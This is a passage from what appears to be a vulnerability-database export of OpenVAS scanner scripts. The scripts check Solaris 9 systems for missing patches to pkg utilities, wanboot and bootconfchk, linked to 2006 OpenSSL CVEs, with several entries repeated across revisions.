\"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n pkg utilities\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.855369\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:24:08 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"113713-27\");\n script_cve_id(\"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2006-4339\", \"CVE-2006-2937\", \"CVE-2006-2940\");\n script_name( \"Solaris Update for pkg utilities 113713-27\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-113713-27-1\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of pkg utilities\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"113713-27\", package:\"SUNWarc SUNWcsr SUNWhea SUNWcsu\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:14:08", "description": "Check for the Version of wanboot", "cvss3": {}, "published": "2009-06-03T00:00:00", "type": "openvas", "title": "Solaris Update for wanboot 122715-02", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2006-4339"], "modified": "2017-02-20T00:00:00", "id": "OPENVAS:855170", "href": "http://plugins.openvas.org/nasl.php?oid=855170", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for wanboot 122715-02\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"wanboot on solaris_5.9_x86\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n wanboot\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(855170);\n script_version(\"$Revision: 5359 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 12:20:19 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:31:50 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"122715-02\");\n script_cve_id(\"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2006-4339\", \"CVE-2006-2937\", \"CVE-2006-2940\");\n script_name( \"Solaris Update for wanboot 122715-02\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-122715-02-1\");\n\n script_summary(\"Check for the Version of wanboot\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"i386\", patch:\"122715-02\", package:\"SUNWwbsup\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:13:55", "description": "Check for the Version of bootconfchk", "cvss3": {}, "published": "2009-06-03T00:00:00", "type": "openvas", "title": "Solaris Update for bootconfchk 123377-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2006-4339"], "modified": "2017-02-20T00:00:00", "id": "OPENVAS:855366", "href": "http://plugins.openvas.org/nasl.php?oid=855366", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for bootconfchk 123377-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"bootconfchk on solaris_5.9_x86\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n bootconfchk\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(855366);\n script_version(\"$Revision: 5359 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 12:20:19 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:31:50 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"123377-01\");\n script_cve_id(\"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2006-4339\", \"CVE-2006-2937\", \"CVE-2006-2940\");\n script_name( \"Solaris Update for bootconfchk 123377-01\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-123377-01-1\");\n\n script_summary(\"Check for the Version of bootconfchk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"i386\", patch:\"123377-01\", package:\"SUNWwbsup\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:13:48", "description": "Check for the Version of bootconfchk", "cvss3": {}, "published": "2009-06-03T00:00:00", "type": "openvas", "title": "Solaris Update for bootconfchk 123376-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2006-4339"], "modified": "2017-02-20T00:00:00", "id": "OPENVAS:855376", "href": "http://plugins.openvas.org/nasl.php?oid=855376", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for bootconfchk 123376-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"bootconfchk on solaris_5.9_sparc\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n bootconfchk\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(855376);\n script_version(\"$Revision: 5359 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 12:20:19 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:31:50 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"123376-01\");\n script_cve_id(\"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2006-4339\", \"CVE-2006-2937\", \"CVE-2006-2940\");\n script_name( \"Solaris Update for bootconfchk 123376-01\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-123376-01-1\");\n\n script_summary(\"Check for the Version of bootconfchk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"123376-01\", package:\"SUNWwbsup\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:38:38", "description": "Check for the Version of bootconfchk", "cvss3": {}, "published": "2009-06-03T00:00:00", "type": "openvas", "title": "Solaris Update for bootconfchk 123376-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2006-4339"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310855376", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310855376", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for bootconfchk 123376-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"bootconfchk on solaris_5.9_sparc\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n bootconfchk\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.855376\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:31:50 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"123376-01\");\n script_cve_id(\"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2006-4339\", \"CVE-2006-2937\", \"CVE-2006-2940\");\n script_name( \"Solaris Update for bootconfchk 123376-01\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-123376-01-1\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of bootconfchk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"123376-01\", package:\"SUNWwbsup\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:40:44", "description": "Check for the Version of pkg utilities", "cvss3": {}, "published": "2009-09-23T00:00:00", "type": "openvas", "title": "Solaris Update for pkg utilities 114568-27", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2006-4339"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310855640", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310855640", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for pkg utilities 114568-27\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"pkg utilities on solaris_5.9_x86\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n pkg utilities\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.855640\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-23 10:48:35 +0200 (Wed, 23 Sep 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"114568-27\");\n script_cve_id(\"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2006-4339\", \"CVE-2006-2937\", \"CVE-2006-2940\");\n script_name(\"Solaris Update for pkg utilities 114568-27\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-114568-27-1\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of pkg utilities\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"i386\", patch:\"114568-27\", package:\"SUNWarc SUNWcsu SUNWcsr SUNWhea\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:14:08", "description": "Check for the Version of wanboot", "cvss3": {}, "published": "2009-06-03T00:00:00", "type": "openvas", "title": "Solaris Update for wanboot 117123-08", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2006-4339"], "modified": "2017-02-20T00:00:00", "id": "OPENVAS:855008", "href": "http://plugins.openvas.org/nasl.php?oid=855008", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for wanboot 117123-08\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"wanboot on solaris_5.9_sparc\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n wanboot\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(855008);\n script_version(\"$Revision: 5359 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 12:20:19 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:28:12 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"117123-08\");\n script_cve_id(\"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2006-4339\", \"CVE-2006-2937\", \"CVE-2006-2940\");\n script_name( \"Solaris Update for wanboot 117123-08\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-117123-08-1\");\n\n script_summary(\"Check for the Version of wanboot\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"117123-08\", package:\"SUNWcar.us SUNWwbsup SUNWcar.u\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:40:37", "description": "Check for the Version of wanboot", "cvss3": {}, "published": "2009-06-03T00:00:00", "type": "openvas", "title": "Solaris Update for wanboot 122715-02", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2006-4339"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310855170", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310855170", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for wanboot 122715-02\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"wanboot on solaris_5.9_x86\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n wanboot\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.855170\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:31:50 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"122715-02\");\n script_cve_id(\"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2006-4339\", \"CVE-2006-2937\", \"CVE-2006-2940\");\n script_name( \"Solaris Update for wanboot 122715-02\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-122715-02-1\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of wanboot\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"i386\", patch:\"122715-02\", package:\"SUNWwbsup\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:39:22", "description": "Check for the Version of bootconfchk", "cvss3": {}, "published": "2009-06-03T00:00:00", "type": "openvas", "title": "Solaris Update for bootconfchk 123377-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2006-4339"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310855366", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310855366", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for bootconfchk 123377-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"bootconfchk on solaris_5.9_x86\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n bootconfchk\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.855366\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:31:50 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"123377-01\");\n script_cve_id(\"CVE-2006-3738\", \"CVE-2006-4343\", \"CVE-2006-4339\", \"CVE-2006-2937\", \"CVE-2006-2940\");\n script_name( \"Solaris Update for bootconfchk 123377-01\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-123377-01-1\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of bootconfchk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"i386\", patch:\"123377-01\", package:\"SUNWwbsup\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:40:39", "description": "Check for the Version of wanboot", "cvss3": {}, "published": "2009-06-03T00:00:00", "type": "openvas", "title": "Solaris Update for wanboot 117123-08", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2006-4339"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310855008", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310855008", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for wanboot 117123-08\n#\n# Authors:\n# 